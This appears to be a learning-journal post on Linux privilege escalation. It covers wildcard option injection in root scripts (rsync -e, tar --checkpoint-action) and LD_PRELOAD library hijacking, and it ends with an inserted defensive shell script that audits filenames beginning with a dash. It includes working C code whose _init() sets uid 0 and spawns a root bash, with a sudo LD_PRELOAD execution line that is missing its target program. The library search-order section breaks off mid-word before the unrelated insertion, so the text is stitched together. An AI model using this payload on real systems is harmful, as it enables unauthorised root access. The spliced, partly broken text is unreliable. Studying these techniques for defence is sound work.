
Day 18: The Danger of Wildcards (*) & Library Injection 🕵️‍♂️
🛠️ The "Option Injection" Breakdown

1. When Filenames become Commands

When a script runs rsync -av * /backup/, the shell expands the * into a list of all files in the directory. If an attacker creates a file named -e, rsync interprets it as an option, not a file.

The Exploit: Using an injected option such as rsync's -e or tar's --checkpoint-action to force the program to execute a malicious script as root.

The Fix: Never use naked wildcards in root scripts. Always use absolute paths or the -- separator to signal the end of command options.

2. Hijacking the Dynamic Linker (LD_PRELOAD)

I practiced forcing a program to load a malicious .so (shared object) file before its legitimate libraries. By defining a void _init() function in C, I can execute code the moment the library is loaded.

    // root.c
    #include <stdlib.h>   /* system() */
    #include <unistd.h>   /* setuid() */

    /* _init() runs as soon as the dynamic linker loads this shared object. */
    void _init() {
        setuid(0);
        system("/bin/bash");
    }

Execution: sudo LD_PRELOAD=/tmp/root.so

3. Library Search Order

Understanding how the loader finds libraries is key to Shared Library Hijacking. The typical order is: RPATH / R
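
For the wildcard fix in section 1, an added example (not code from the original post): these shell functions model how a getopt-style parser classifies arguments, compare a bare * with -- * and ./*, and list the names in a directory that begin with -. The function names and the sample directory are constructed for illustration, the parser is a simplified model rather than rsync's own, and ./* is a common alternative to the -- separator that the post does not mention.

```shell
# Added example: model of getopt-style argument splitting (not rsync's real parser).

# Count arguments a getopt-style parser would treat as options:
# anything starting with '-' that appears before a literal '--'.
count_as_options() {
    n=0
    for arg in "$@"; do
        case $arg in
            --) break ;;                 # end of options: the rest are operands
            -?*) n=$((n + 1)) ;;         # looks like an option, whatever its origin
        esac
    done
    echo "$n"
}

# Expand the glob inside directory $1 using one invocation style ($2)
# and report how many of the resulting arguments parse as options.
options_seen() (
    cd "$1" || exit 1
    case $2 in
        bare)      count_as_options * ;;     # what "rsync -av * /backup/" does
        separator) count_as_options -- * ;;  # the post's fix
        prefixed)  count_as_options ./* ;;   # assumption: alternative fix
    esac
)

# Audit helper: print names in directory $1 that begin with '-'.
list_option_like_names() (
    cd "$1" || exit 1
    for f in ./-*; do
        [ -e "$f" ] || [ -L "$f" ] || continue   # glob matched nothing
        printf '%s\n' "${f#./}"
    done
)

# Constructed sample directory: two ordinary files plus one named "-e".
make_sample_dir() {
    d=$(mktemp -d) || return 1
    for f in report.txt notes.txt -e; do : > "$d/$f"; done
    echo "$d"
}

if [ "${1:-}" = demo ]; then
    d=$(make_sample_dir)
    for s in bare separator prefixed; do echo "$s: $(options_seen "$d" "$s")"; done
    rm -rf -- "$d"
fi
```

Running the audit helper over directories that root-owned cron jobs or backup scripts glob in shows which filenames would reach a command as options.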




